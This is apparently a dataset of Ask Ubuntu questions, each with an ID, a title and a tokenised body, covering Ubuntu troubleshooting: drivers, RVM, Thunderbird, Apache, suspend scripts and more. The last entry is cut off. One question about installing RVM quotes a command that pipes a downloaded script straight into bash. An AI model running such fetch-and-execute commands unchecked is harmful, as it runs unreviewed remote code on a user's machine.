92038	how do i make my windows media center remote control work ?	how do i make my windows media center remote control work ? here 's the lspci output : 00:00.0 host bridge : intel corporation 82x38/x48 express dram controller 00:01.0 pci bridge : intel corporation 82x38/x48 express host-primary pci express bridge 00:06.0 pci bridge : intel corporation 82x38/x48 express host-secondary pci express bridge 00:19.0 ethernet controller : intel corporation 82566dc-2 gigabit network connection ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 raid bus controller : intel corporation 82801 sata raid controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : ati technologies inc rv620 le [ radeon hd 3450 ] 01:00.1 audio device : ati technologies inc rv620 audio device [ radeon hd 34xx series ] 02:00.0 multimedia video controller : conexant systems , inc. cx23885 pci video and audio decoder ( rev 04 ) 04:00.0 usb controller : nec corporation usb ( rev 43 ) 04:00.1 usb controller : nec corporation usb ( rev 43 ) 04:00.2 usb controller : nec corporation usb 2.0 ( rev 04 ) 04:0a.0 firewire ( ieee 1394 ) : texas instruments tsb43ab22/a ieee-1394a-2000 controller ( phy/link )
92049	can not get rvm to install correctly	is anyone noticing problems when trying to install rvm on ubuntu ? i have both ruby 1.8.7 and 1.9.2 installed on my machine but ca n't figure out how to make it default to 1.9.2 other than the rvm route . however , when i go to install rvm using the following command : bash -s stable < < ( curl -s https : //raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer ) i receive this error message : warning : /usr/share/ruby-rvm/archives/wayneeseguin-rvm-stable.tgz : permission warning : denied 0 792k 0 2896 0 0 1878 0 0:07:11 0:00:01 0:07:10 128k curl : ( 23 ) failed writing body ( 0 ! = 2896 ) could not download 'https : //github.com/wayneeseguin/rvm/tarball/stable ' . curl returned status '23 ' . i looked around for a fix but could n't locate one . this problem has been bugging me since august . any help if much appreciated . ps . if it is easier to remove 1.8.7 , do you suggest i just do that ? update : using sudo apt get . i almost ca n't believe what a pain in the a & & it is just to use rvm . after i finally got rvm installed and the bash files working correctly , i went to install ruby version 1.9.2 . of course , the rvm git file has the wrong code as you can read about in this link : https : //github.com/wayneeseguin/rvm/commit/52018750763d5321b7b993e201c8589b98e090f9 so here we go again , i opt to use rvm install 1.9.2-head and it installs this version of ruby correctly . i then tell rvm to use version 1.9.2 with the follow command , rvm use 1.9.2-head . rvm tells me it is now using 1.9.2 . but then when i version check ruby with ruby -v , i find out that it is still using 1.8.7 . why is it so difficult to get this working ? i feel like i 've wasted hours on something that should have been relatively easy .
92053	can i use the same thunderbird profile under windows and ubuntu ?	hi i 'm curious if it 's possible to use the same thunderbird profile , stored on a nas , form an ubuntu based pc as well as from a windows based one . anybody out there with some experience ? since one month , i now use a setup , where i have stored the thunderbird profile on my nas and use it from different pc 's under windows . i would like to keep it like this , while switching one of the pc 's to ubuntu 11.10 ( just done and it runs quite well ) and use the same profile .
92054	log boot messages on tty1 instead of tty7	i 'd like to see my boot messages in a different vt than 7 . can it be changed ? can i get the old behaviour - to get a login prompt after all boot-up is complete in tty1 ? regards , aurocha
92061	how can i get my bluetooth to work ?	ive googled , and cant find anything that helps . seeing as how everything i found was almost completely irrelevant to my situation , im just gon na ask for help here . so , the line out in my computer is broken so i cant connect speakers . i am trying to connect my sony bluetooth headset and my computer ca n't see them . before i had ubuntu , i never had problems connecting them on windows . but now , running 11.10 , my bluetooth mouse works , my phone does n't connect , and my headset will not show up on the devices list . so.. what do i got ta do ?
92063	i ran 11.04 on a mac and i loved it . why does it look different on a pc ?	i booted a ubuntu 11.04 live cd on a mac and i fell in love with the interface . so i decided to install it on my pc . imagine my dismay when the interface was just the blah standard windows style ubuntu i 've always been used to . i just really like the mac-like interface i saw on the mac . is there a way to see/install ubuntu on a pc and have it use the mac interface ? i do n't want it to emulate mac . i want it to look and behave like ubuntu live as it defaults on a mac machine .
92064	how do i downgrade from 11.10 to 8.10 ?	i preferred ubuntu 8.10 to ubuntu 11.10 . i would like to downgrade my computer , even if it means erasing all my files . can anyone help me ?
92069	how to add custom directory e.g . phpmyadmin ?	as my knowledge about apache is minimal . i 'd like to let it grow so i 'd have more experience with lamp . my hot question for today is : how to add custom directory to webserver ? ( e.g . phpmyadmin ) ? my goal is to be able to create custom addresses with custom websites within . let 's suppose that i have my custom directory at : /media/my/web/portal1 and i 'd like to load it when client calls http : //localhost/myportal1 at webbrowser . could you give me a list of steps with few words of explanation ?
92074	how to change desktop icon text background color ?	how do i change the background color of desktop text in 11.10 . i used gnome color chooser in version 10.04 , but it 's not working in ubuntu 11.10 . is there any way to solve this ? also , by default there is no background just white fonts , which is a problem when i use light color wallpaper .
92078	should i keep using the version of flash in the sevenmachines ppa ?	i 've been running ubuntu 10.04 ( lucid ) 64-bit for about one year now . everything still seems to be working properly , but for the last two months , i 've been getting this error message every time update manager runs : '' failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/lucid/main/binary-amd64/packages.gz 404 not found some index files failed to download , they have been ignored , or old ones used instead . '' i did a bit of searching , and the best i can find is that sevenmachines is n't supporting this software anymore and has deleted everything relating to it . i have n't been able to find anything discussing a new version or even how to get synaptic/update to stop looking for updates to this software . most of what i 've found dates to mid 2010 and is no longer current ( in fact , most of what i 've found is how to install the sevenmachines version ) . should i keep running version 11.0.1.129-0ubuntu0~sevenmachines1 ? if yes , how do i get synaptic to stop looking for updates that no longer exist ? if not , what software should i be installing to replace it and still keep flash working ?
92079	ccsm broke my unity 3d on 11.10	ok . i wanted to see how 3d cube would look like with my 11.10 , so i installed ccsm and turned on 3d cube and disabled expose ( think that is what it is called ) . then after that everything went sideways . i can get to the desktop but only see part of the top panel , no launcher , no indication area , just 'file ' 'edit ' 'view ' ... 'help ' alt+f2 does not work , the super key does not bring up the dash . unity 2d works , but i rather unity 3d . ccsm in 2d did not help . what can i do to restore unity to before my fiddling with it ? i tired ctrl+alt+f1 ( to try some thing in terminal i saw for an answer to a question similar to mine ) at the log in but i just got a black screen that was not responsive . thank you for your time and answers .
92080	why do i have poor video performance in browsers with a ati hd3650 gpu ?	i 'm experiencing poor video performance on youtube , both in firefox and in opera - flash and html5 ( all of the combinations ) . html5 is actually worse . videos on vimeos such as http : //vimeo.com/channels/hd # 33971928 play super smoothly sometimes , choppy other times . usually smoothly for first 5 seconds , choppy later , sometimes recover . lenovo thinkpad t500 < br > ubuntu 11.10 x64 < br > amd 3650 graphics , catalyst 11.10 < br > unity 3d , unity 2d < br > flash 11,2,202,160 ( iirc the 64 bit one installed through flash-aid did n't make any difference ) it 's frustrating as on windows i have n't experienced this kind of issue on a decade old hardware . it seems it got solved by a single change - switching from ati hd3650 to integrated intel graphics card . now i can play smoothly even 1080p yt videos . but the performance is poor if switched back .
92081	is there a difference between using setuid ( ) /setgid ( ) within a program and invoking it with sudo -u xxx -g xxx ?	consider this python script , which invokes handbrakecli , a program that attempts to read from the dvd drive : invoke.py # ! /usr/bin/python import sys import os import subprocess as subp import pprint # immediately switch users os.setgid ( 1002 ) # gid of `` media '' os.setuid ( 1005 ) # uid of `` jack '' # verify the switch worked print os.getuid ( ) , os.geteuid ( ) print os.getgid ( ) , os.getegid ( ) # clear up any possible env var diffs os.environ [ 'user ' ] = 'jack' os.environ [ 'username ' ] = 'jack' os.environ [ 'logname ' ] = 'jack' # output env variables to see if there 's anything different : ff = open ( 'env_ % s.log ' % sys.argv [ 1 ] , 'w ' ) ff.write ( pprint.pformat ( dict ( os.environ ) ) ) ff.write ( `` \n '' ) ff.close ( ) # call the program p = subp.popen ( [ `` handbrakecli '' , `` -i '' , `` /dev/sr0 '' , `` -t '' , `` 0 '' ] ) p.communicate ( ) sys.exit ( p.returncode ) the following ( `` a '' ) succeeds : sudo -u jack -g media handbrakecli -i /dev/sr0 -t 0 as does this ( `` b '' ) : sudo -u jack -g media ./invoke.py jack but this ( `` c '' ) fails : sudo ./invoke.py root and prints errors suggesting that handbrakecli was unable to access the cd drive . the print statements confirm that the uid/gid were successfully changed to jack : media , however . if i remove the setuid/setgid and call handbrakecli from invoke.py as root , it works once again . a diff shows the environments are essentially the same : $ diff env_root.log env_jack.log 8c8 < 'sudo_command ' : './invoke.py root ' , -- - > 'sudo_command ' : './invoke.py jack ' , after invoking setuid and setgid , is there any `` memory '' of the original invoking user ? if not , what could handbrake possibly be seeing differently between `` b '' and `` c '' ? i am running 10.04 on a headless server which i access via ssh .
92082	how can i verify the integrity of an mbox archive from the command line ?	i have a large mbox file backup from gmail . it 's over 5gb , and gets updated with new messages every night via a cron job . i would like the cron job to also check the validity of the archive , to make sure it 's still a valid mbox format . is there a command-line tool to verify an mbox file , or at least list the most recent messages ?
92083	ca n't open catalyst with administrative privileges	for some reason i ca n't open catalyst with administrative privaleges on xubuntu 11.10 . the regular catalyst control center works fine , but it does n't allow me to make necessary changes to my multiple monitor configuration . is there a way to open it through the terminal with a sudo command , or is there anything else i should be looking for ? i used the command the following command to open catalyst with admin privilages : sudo amdcccle i get the same results with gksu . it automatically configure my multiple monitors and placed one on top of the other , instead of side by side . it wo n't allow me to make any changes . every time i try to hit the apply button , it closes without making any changes . if i go to display , in the settings manager , it does n't give me the option to configure multiple desktops . however , the changes i make there do stick .
92084	how to remove xubuntu-desktop ?	a few days ago i installed xubuntu on top of a normal ubuntu system : sudo apt-get install xubuntu-desktop i did n't play around for long on xubuntu before i realised that i liked ubuntu 2d better . now my problem is how do i uninstall xubuntu and all of it 's dependencies and the recommended packages like thunar and abiword . for now i just run : sudo apt-get remove xubuntu-* but i still have a lot left from xubuntu . it would be nice if by doing apt-get remove xubuntu-desktop all of the packages installed with the metapackages were also removed , but that is not the case .
92085	fglrx frame rate capped at 60fps ?	i 've got a really weird thing where i ca n't seem to get frame rates to exceed 60fps exactly . it really seems like a cap is being placed on it , it never exceeds 60.000 fps , though i know i could get a lot more out of it : using glx_sgix_pbuffer 279 frames in 5.0 seconds = 55.800 fps 299 frames in 5.0 seconds = 59.800 fps 295 frames in 5.0 seconds = 59.000 fps 296 frames in 5.0 seconds = 59.200 fps 299 frames in 5.0 seconds = 59.800 fps 299 frames in 5.0 seconds = 59.800 fps 298 frames in 5.0 seconds = 59.600 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 298 frames in 5.0 seconds = 59.600 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 300 frames in 5.0 seconds = 60.000 fps 299 frames in 5.0 seconds = 59.800 fps 300 frames in 5.0 seconds = 60.000 fps i can drag the window around smoothly and do other stuff at the same time that fgl_glxgears is running and the fps does n't really show any difference . it really seems that things are being limited somewhere . is there any way to find out where this limit is being enforced and how to disable it ?
92088	how to play realmedia / smil / rtsp audio references with start/end points	i 'm trying to play the song referenced at a prairie home companion : may 6 , 2006 - moonlight on the colorado river lyrics . for some of my friends , the `` listen '' link there plays just the song whose lyrics are listed . but when i click on it ( via chrome on a maverick system with totem as my player ) , i hear the entire 2-hour program . the listen link redirects to a smil file which references `` rtsp : //mprrm.publicradio.org/5559/phc/2006/05/06_phc.rm ? start=00:00:04:10.0 & end=00:00:07:08.0 '' , which specifies a start time of 04:10 and an end time of 07:08 . but it seems that totem is ignoring the start and end times . are there open source music players in the ubuntu repos that properly handle this link ? i 'm guessing based on the how can i play .smil videos ? - ask ubuntu - stack exchange that ambulant might handle it , but i guess that is n't yet in the repos ? and realplayer presumably works , but as pointed out at ( realplayerinstallationmethods - community ubuntu documentation ) , it is n't open source . update : for totem , the relevant upstream bug seems to be bug 424708 – add support for starttime , which is present in launchpad as bug # 605370 “.smi files are not played correctly” as @ student pointed out . for some insights on the relevant playlist format and editing see also video playlists with start and end times - unix and linux i 'm still looking for some way to play these videos as intended .
92109	installing drivers for a windows 7 guest in virtualbox	i am new to ubuntu . i want to know how to install drivers such as lan , wifi , audio , video & graphics , webcam and so in windows 7 32bit installed as a guest os inside ubuntu 10.10 ( host ) using virtual box 3.2.8 . i am using this in a toshiba satellite c650 psc 14g . i had downloaded the drivers from the toshiba website . they work fine when using windows 7 32 bit as host os . then what are the main differences between dual boot and virtual box ?
92110	how do i make a logitech c525 hd webcam work ?	how do i make a logitech c525 hd webcam work ?
92112	are partition sizes displayed in megabytes or mebibytes during installation ?	good day , ladies and gentlemen ! just to reassure myself : as far as i read in here , ubuntu uses the correct decimal base interpretation of the mb prefix . so , in nautilus , a file of 1mb is actually really 103 kb ( 1000 kilobytes ) and 1gb = 103 mb ( 1000 megabytes ) . however , i want to know if the same is true during the installation of ubuntu , when creating the partitions manually . am i right to enter 20000mb if i want a 20gb partition ?
92117	nvidia vga and ubuntu 11.10	i installed ubuntu 11.10 amd64 and it used the default settings and vga driver : unknown both screens sere working regardless of the errors of turning the laptop 's off then both go off forever ! so i tried installing nvidia driver in both ways , i . from the additional drivers current-driver way and ii . the manual : sudo service lightdm stop sudo sh nvidia ... _.run sudo service lightdm start both had the same results , in system info : graphics : unknown , in display settings : one unknown display is detected `` the laptop 's '' and ** can not detect my other display** what i did is that i modified the display 's settings from nvidia settings as a root in order to save the settings sudo nvidia-settings lg display > enabled , res : 1920- 1080 , 60hz , left of ( separate display options ) laptop display > right of now the external screen can turn it 's lights on but not useful at all i ca n't make it the default primary screen nor i can use it as primary if i disable the laptop 's the other turns off along with it i believe if the graphics : unknown problem is solved then all is solved the system does n't recognize the driver as if it is on it 's own nvidia admins said it is a problem of the system not the driver '' it was working properly with ubuntu 10 . 04 with nvidia manual driver installation '' hardware info : computer type : laptop , type : asus f8sn , cpu 2 . 4 core 2 due t8300 santarosa penryn , vga : nvidia geforce 9500m gs , motherboard : asus , bus : intel , chipset : intel , external screen : lg e 2205 , dvi connector : dvi-d single link i posted this after maybe the 15th reformat and reinstall of ubuntu to fix this problem
92119	can i upgrade from 10.04 to 11.10 ?	i am using ubuntu 10.04 . i have now a 11.10 dvd . how can i upgrade to this version without loss of data and reformatting the hard disk ?
92124	sharing internet ( wireless broadband usb ) with router	how do i share my internet with a router ? is it as simple as going into network manager and selecting the appropriate connection to the router and selecting `` share with other computers '' under ipv4 settings ? im trying to connect my xbox to the router and the connection just connects and disconnects every 2 seconds indefinitely . any ideas ?
92130	why does it take so much time for ubuntu to update to a new version of firefox	from what i can remember , it always takes atleast more than a month for ubuntu to update firefox . i know there might be some fixes to do with integration with ubuntu , but wo n't this already be done in the beta face too . and if i run the archive directly from firefox site , it is pretty stable . only the ubuntu integration is missing . so just why ? that 's all .
92144	my update manager does n't update	well , i 've installed ubuntu 11.10 from a couple of weeks & tried to update my software but it does n't work . each time i 'm trying to update with the update manager , there 's an error for '' requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . '' tried everything in the questions before , from my network connection & it was good & tried to see the archive packages and this is what i 've w : gpg error : http : //eg.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/sevenmachines/flash/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . do n't know what 's the problem ? ! ! !
92150	how to hide xchat icon from panel ?	i am using ubuntu 11.04 and i have installed xchat . how do i hide xchat icon from my panel ? please find the attached screenshot for the reference .
92153	poor performance after reinstalling to a usb drive	i am currently running ubuntu 11.10 off of a sandisk 16gb usb . i installed it using a live usb with the following partition configuration : 6gb primary /dos fat32 5gb logical / ext4 5gb logical /home ext4 i do n't have a hard disk , and do n't see myself getting one anytime soon . i rely solely on this 16gb , and two other 4gb usbs , one of which i used as the liveusb . i bring the usbs around , and even use the install at work . i previously used an install that used a swap file . it functioned fine for the most part , save for a few slow moments , but i came across this post , and it got me thinking about my usb 's life , so i reinstalled with the current config . my problem now is that it is slower . applications like firefox would hang more often . in my previous setup ( the automatically partitioned setup ) , firefox would start hanging if i was running an unzip or install task on the same partition as / . now however , it would hang if i had another window open i.e . the system settings window . my guess is that it may have something to do with the swap file or the install being on a logical partition rather than a primary partition , but i do n't know . any insight as to why it has slowed down ?
92157	why does wubi.exe for ubuntu 11.10 not run on windows 7 32bit ?	i installed ubuntu 11.04 32bit before with the wubi installer.i therefore completely uninstalled ubuntu and downloaded the new ubuntu 11.10 32bit.but now when i execute the wubi.exe it does n't start.i just get a quick change of the mouse pointer showing that something happened but then nothing , no error messages . can anyone help me ? ===== summary of a discussion so far during the investigation : are you absolutely sure you downloaded 32bit ubuntu 11.10 ? are you sure you are using 32bit windows 7 and not 64bit windows ? did you do a md5sum checksum to confirm the iso downloaded is valid and not corrupted ? hey i downloaded ubuntu-11.10-desktop-i386.iso & am sure about win7 32bit & iso image md5 is : c396dd0f97bd122691bdb92d7e68fde5 i checked both hashes from ubuntu & mine both same thats the desktop version ... the md5 sum looks ok. did you use this webpage to download from ? ubuntu.com/download/ubuntu/windows-installer i download it from ubuntu.com/download/ubuntu/download full .iso image not only wubi what happens if you start wubi.exe from a command line ? if i write start h : \wubi.exe in cmd ... nothing happened without quick change of the mouse pointer showing that something happened is this a standard pc or a work-environment pc ? i.e . you do have administrator rights or some-sort of clampdown on windows 7 ? i am only user & administrator of my pc & it is a standard pc
92160	how can i direct gnome-tweak-tool to list extensions alphabetically ?	on ubuntu 11.10 , using gnome-tweak-tool ( 3.2.0-0ubuntu1 ) , i have great difficulty finding specific extensions . the ordering seems random . i have looked and looked.. but i do not see any ordering options . is there a way to change the ordering to be alphabetic ? or by provider , perhaps ?
92161	i am getting an error while mounting my ntfs drives ?	friends please help me with this error when i try to mount the ntfs drive i getting an error like for to mount the ntfs partitions i have to use the storage device manager every time any help to mount them in a usual ( on mouse clicking ) way of mounting the drives .
92164	why is vlc minimized while playing video or audio ?	i have installed vlc from ubuntu software center i have used it perfectly for some days but now while i try to play a audio or video its get minimized to system tray . tried i have clicked on the vlc icon in the tray but no use with that menu . tried to play a video from vlc through terminal but its still minimized to try . uninstalled and installed from different sources ( downloaded from vlc official site ) but no use .
92166	ubuntu 11.10 is on external hdd , how to boot ( using grub4dos ) , and which initrd and vmlinuz to use ?	i installed ubuntu 11.10 on external hdd . how can i boot it ? i used grub4dos before , and it worked with fedora distributions . problem i have now is that i do n't know which initrd and vmlinuz files to use . tried with one i have in /boot directory , but booting did not worked ... can you give me some ideas what to try , do i have to use different initrd and vmlinuz , or i can solve this with other solutions . also , just to mention that boot goes to busybox v1.18.4 command prompt . thank you in advance !
92167	why am i unable to install , remove or upgrade packages ?	when i wan na do anything with synaptic or apt-get or stop , start , restart postgresql i receive following error setting up postgresql-common ( 114 ) ... * starting postgresql 8.4 database server * insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 63 . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgresql-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm using ubuntu 11.04 . i canceled upgrade to 11.10 last night during upgrade , and changed source.list , then reload package information from synaptic . maybe this is related to the issue in some way , however , i changed source.list back to default and reload it again , but , it does n't solve my problem .
92169	touchpad gestures to change workspace	i was talking to a friend who owns a mac . he has his set up so that when he swipes three fingers across his touchpad , it moves to the workspace in that direction . is it possible to set this up in ubuntu ? thank you .
92172	how does one manage the upload speed of ubuntu one ?	i love file-sharing platforms like ubuntu one . up to now i used dropbox and there you can see the progress of uploading ( with moving the mouse-cursor over the dropbox icon on the lower right edge ) . in ubuntu one i do n't see a way to control the progress of uploading . i really miss that function , because it seems to synchronise quite slow ( a 22 mb file is syncing for several minutes now ) . is there a way to control the progress ?
92174	disabling vsync in unity/mutter/compiz ?	yesterday i was still using natty with compiz . i had noticed that disabling vsync in compiz made dragging windows much more smooth and responsive ( i do n't mind the tearing ) . i installed ocelot this morning which seems to use mutter by default ( i may be wrong there , i 'm still kind of lost ) . dragging windows has the same sluggish feeling as with compiz and vsync enabled . so i was thinking i could try disabling vsync . can vsync be disabled/enabled in mutter ? edit to answer the comments : $ ps -ef | grep compiz | grep $ user < myname > 3989 3908 5 12:14 ? 00:03:38 compiz < myname > 4051 3989 0 12:15 ? 00:00:00 /bin/sh -c /usr/bin/compiz-decorator < myname > 15409 15406 0 13:25 pts/0 00:00:00 grep compiz so indeed i was confused . if i 'm running compiz i should manage to bend it to my will .
92176	drag & drop attachment to thunderbird 's icon in unity ?	i 'm using ubuntu 11.10 with unity 3d and thunderbird 9.0 . when i have a composing window for an email i 'd like to attach a file using drag & drop via tb 's icon on unity . with past ubuntu 11.04 it was possible , but not now . may i have again this possibility ?
92183	how can i make pcmanfm open plain text files with leafpad by default in lubuntu ?	when i 'm using pcmanfm , i sometimes do the following . i right-click in an empty place in ~/ , and choose make new ... -- > empty file . i type some text in it , like 'blabalballabl ' , and then i save it , e.g. , as test . now , i double-click this file . leafpad wo n't open the file , but instead pcmanfm will say that the file is executable . it then asks if i want to execute the file or not . i do n't want this to happen , i just want leafpad to open the file . right-clicking the file , then changing the default application to open this type of files does n't help . is there any way to force pcmanfm to open files like these with leafpad by default ? i 'm using lubuntu 11.10 32 bit . pcmanfm asks to execute the file changing the default program to open the file does n't help . mimeapps.list looks ok ; text/plain should be opened by leafpad .
92184	how do i port software that i have written for windows to ubuntu ?	i have written software packages for the windows platform . i want to change to ubuntu . at the moment i use visual basic and access databases . can anyone suggest what i should use to rewrite my software for the linux platform ? it must be known that i am a complete novice to linux . any assistance will be much appreciated .
92185	time indicator is not showing the date/time	yesterday i noticed that time indicator on the top pane is not showing the date/time , but is just saying `` time '' ( see attached screenshot ) . does anyone know why is that so ? how can i fix it and make show the date/time back again ? reinstalling indicator-datetime did not help .
92188	black screen when booting on an acer aspire 5732z	since i´m getting more and more into linux i got the idea that i should start dualbooting on the family laptop . first i downloaded wubi to dualboot ubuntu with windows 7 home premium on an acer aspire 5732z laptop . then i restarted and looked forward for ubuntu but the screen is almost black . i can barely see some ad about `` excellent apps '' but not enough to be able to do anything about it . beside being a newbie and computerlexic , what´s my issue ? integrated 3d graphics , featuring intel® graphics media accelerator 4500m ( intel® gma 4500m with up to 1759 mb of intel® dynamic video memory technology 5.0 ( 64 mb of dedicated video memory , up to 1695 mb of shared system memory ) , supporting microsoft® directx® 10
92190	how do i start an application maximized without decorations in gnome-shell ?	there is a possibility to configure application ( for me darktable ) that start in full screen mode without the title bar ( i use gnome shell in ubuntu 11.10 ) ?
92193	ubuntu one and mp3 tags	i recently upload my songs on ubuntu one . some of them were not recognized so , i 've edited the mp3 tags using the `` easy tag '' software . all the songs have been synchronized correctly . i 've waited one day ( because of the thread ubuntu one music showing 'unknown artist ' and 'unknown album ' for most songs ) , and now all my songs are listed under `` unknow artist/unknow album '' . what should i do ? thanks
92197	how to load graphical login screen ?	i have just upgrade to 11.10 from 10.04 . i can not see login screen on tty7 . i can still login into tty 1-6 . i have tried install gnome-shell from gnome3 ppa and gnome-panel but it does n't help . what should i do ?
92199	how do i change the icon size in gnome fallback mode menu ?	i have searched several hours , but did not find an answer yet : changing the size of the gnome panel menu ( the applications menu that is provided by main menu and menu bar applets , that is . ) in gnome fallback mode / classic panel ( which is a fork gfbm ) in classic gnome , i can change the icon size ( and thus the dimension of the whole menu , thats what i am after ) via these entries in .gtkrc gtk-icon-sizes = `` gtk-menu=16,16 : gtk-button=16,16 : gtk-dnd=16,16 : panel-menu=16,16 : panel=16,16 : gtk-dialog=16,16 : gtk-small-toolbar=16,16 : '' now i looked into the gtk-icon-sizes entry in gnome3/gtk3 documentation , and panel-menu=16,16 : panel=16,16 seem to be missing in version 3. putting these into ~/.config/gtk-3.0/settings.ini thus did not help either . i figureed out that the style settings for fallback mode is in /apps/gnome-panel.css , but i did not see anything releated to size there , just color . does anybody have a clue how to accomplish that ? thanks in advance
92208	how do i completely remove ubuntu ?	i have had the last ubuntu distro ( 10.something ) installed for a year and love it . but i have run in to an issue when i tried to upgrade it to the latest one it did not work and there has come some serious issues now with almost everything and i want to remove ubuntu completely and install the new one . how can i remove the operating system ( i don’t mind formatting the whole thing if that’s what’s needed ) .
92209	do i need to install a driver to fix unstable wireless connection ?	basic question but i want to ask should i install some driver related to my wireless card ? i did not install any so far . i do not know my wireless card model . i am using ubuntu 11 .
92211	both thunderbird and emacs throw d-bus errors unless sudoed ( x ok ! )	i have a newly installed ubuntu system to which i have added lamp and emacs . everything appears to be working with the exception of emacs and thunderbird both throw similar errors : thunderbird warning : application calling glx 1.3 function `` glxcreatepixmap '' when glx 1.3 is not supported ! this is an application bug ! failed to create drawable ( thunderbird-bin:4822 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-uzutljsm2d : connection refused gconf error : no d-bus daemon running ( thunderbird-bin:4822 ) : libunity-critical ** : unity-launcher.vala:154 : unable to connect to session bus : error connecting : connection refused libindicate-error ** : unable to get session bus : error connecting : connection refused trace/breakpoint trap emacs ( emacs:4860 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-w2dtquwcsw : connection refused gconf error : no d-bus daemon running ( emacs:4860 ) : gconf-warning ** : client failed to connect to the d-bus daemon : failed to connect to socket /tmp/dbus-jp1mzfgvet : connection refused however emacs will work if i sudo it and dbus is running , see below : 750 ? ss 0:00 dbus-daemon -- system -- fork -- activation=upstart 1302 ? ss 0:00 //bin/dbus-daemon -- fork -- print-pid 8 -- print-address 10 -- session 1893 pts/0 s 0:00 dbus-launch -- autolaunch 5083cb999a9b950abece203100000005 -- binary-syntax -- close-stderr 1894 ? ss 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 âsession has anybody any ideas ?
92212	`` panic occurred switching back to text console ''	i installed ubuntu on a hp mini 210 , and everything was fine . however , after using the laptop for a while i got the error : panic occurred switching back to text console what could be the reason and what can i do about it ?
92215	should i use ronn or pandoc ?	i wrote a manual page in markdown , and i currently use ronn to convert it into a roff man page . today i discovered pandoc , which can do the exact same thing , but is already packaged in ubuntu . would it make more sense to use mutli tool pandoc instead of the single tool ronn ? i assume that pandoc is more likely to installed somewhere .
92218	how to execute a command after resume from suspend ?	i 've got a script that is executed in order to have suspending/resuming working in my laptop . then i have another series of xinput , xkbset and xmodmap commands that are executed when i initiate a session to have two-finger scrolling and keyboard shortcuts set up . when i resume from suspend , two-finger scrolling and my keyboard shortcuts wo n't work . i need to manually execute the commands in the second file again . how can i add those to the suspend/resume script to have this done automatically ? see below : suspend/resume script /etc/pm/sleep.d/20_custom-ehci_hcd # ! /bin/sh # inspired by http : //art.ubuntuforums.org/showpost.php ? p=9744970 & postcount=19 # ... and http : //thecodecentral.com/2011/01/18/fix-ubuntu-10-10-suspendhibernate-not-working-bug # tidied by tqzzaa : ) version=1.1 dev_list=/tmp/usb-dev-list drivers_dir=/sys/bus/pci/drivers drivers= '' ehci xhci '' # ehci_hcd , xhci_hcd hex= '' [ [ : xdigit : ] ] '' max_bind_attempts=2 bind_wait=0.1 unbinddev ( ) { echo -n > $ dev_list 2 > /dev/null for driver in $ drivers ; do ddir= $ drivers_dir/ $ { driver } _hcd for dev in `ls $ ddir 2 > /dev/null | egrep `` ^ $ hex+ : $ hex+ : $ hex '' ` ; do echo -n `` $ dev '' > $ ddir/unbind echo `` $ driver $ dev '' > > $ dev_list done done } binddev ( ) { if [ -s $ dev_list ] ; then while read driver dev ; do ddir= $ drivers_dir/ $ { driver } _hcd while [ $ ( ( max_bind_attempts ) ) -gt 0 ] ; do echo -n `` $ dev '' > $ ddir/bind if [ ! -l `` $ ddir/ $ dev '' ] ; then sleep $ bind_wait else break fi max_bind_attempts= $ ( ( max_bind_attempts-1 ) ) done done < $ dev_list fi rm $ dev_list 2 > /dev/null } case `` $ 1 '' in hibernate|suspend ) unbinddev ; ; resume|thaw ) binddev ; ; esac touchpad two-finger scrolling and keyboard shortcuts script xinput 